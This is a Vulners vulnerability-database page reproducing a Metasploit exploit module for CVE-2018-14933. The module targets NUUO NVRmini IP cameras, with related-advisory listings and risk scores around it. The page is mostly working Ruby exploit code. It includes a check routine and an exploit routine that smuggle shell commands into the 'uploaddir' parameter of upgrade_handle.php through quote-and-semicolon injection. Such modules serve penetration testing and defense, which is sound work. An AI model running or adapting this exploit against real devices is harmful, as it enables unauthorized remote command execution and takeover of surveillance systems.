Vulners
Lucene search
NUUO NVRmini - upgrade_handle.php Remote Command Execution (Metasploit)
| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
 | NUUO NVRmini upgrade_handle.php Remote Command Execution Exploit | 7 Feb 201900:00 | – | zdt |
 | CVE-2018-14933 | 4 Aug 201800:00 | – | attackerkb |
 | CVE-2018-14933 | 7 Feb 201905:01 | – | circl |
 | NUUO NVRmini Devices OS Command Injection Vulnerability | 18 Dec 202400:00 | – | cisa_kev |
 | CISA Adds Four Known Exploited Vulnerabilities to Catalog | 18 Dec 202412:00 | – | cisa |
 | CVE-2018-14933 | 4 Aug 201819:00 | – | cve |
 | CVE-2018-14933 | 4 Aug 201819:00 | – | cvelist |
 | NUUO NVRmini upgrade_handle.php Remote Command Execution | 6 Dec 201802:51 | – | metasploit |
 | NUUO NVRmini - Remote Command Execution | 3 Jun 202606:04 | – | nuclei |
 | NUUO NVR Web Interface RCE | 18 Oct 201700:00 | – | nessus |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'NUUO NVRmini upgrade_handle.php Remote Command Execution',
'Description' => %q{
This exploits a vulnerability in the web application of NUUO NVRmini IP camera,
which can be done by triggering the writeuploaddir command in the upgrade_handle.php file.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Berk Dusunur', # @berkdusunur
'numan turle' # @numanturle
],
'References' =>
[
['URL', 'https://www.berkdusunur.net/2018/11/development-of-metasploit-module-after.html'],
['URL', 'https://www.tenable.com/security/research/tra-2018-41'],
['CVE', '2018-14933'],
['EDB', '45070']
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true
},
'Platform' => %w{ unix win linux },
'Arch' => ARCH_CMD,
'Targets' => [ ['NUUO NVRmini', { }], ],
'DisclosureDate' => 'Aug 04 2018',
'DefaultTarget' => 0))
end
def check
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'upgrade_handle.php'),
'vars_get' =>
{
'cmd' => 'writeuploaddir',
'uploaddir' => "';echo '#{Rex::Text.rand_text_alphanumeric(10..15)}';'"
}}
)
unless res
vprint_error 'Connection failed'
return CheckCode::Unknown
end
if res.code == 200 && res.body =~ /upload_tmp_dir/
return CheckCode::Vulnerable
end
CheckCode::Safe
end
def http_send_command(cmd)
uri = normalize_uri(target_uri.path.to_s, "upgrade_handle.php")
res = send_request_cgi({
'method' => 'GET',
'uri' => uri,
'vars_get' =>
{
'cmd' => 'writeuploaddir',
'uploaddir' => "';"+cmd+";'"
}}
)
unless res
fail_with(Failure::Unknown, 'Failed to execute the command.')
end
res
end
def exploit
http_send_command(payload.encoded)
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Feb 2019 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.19.8
CVSS 210
EPSS0.93874
SSVC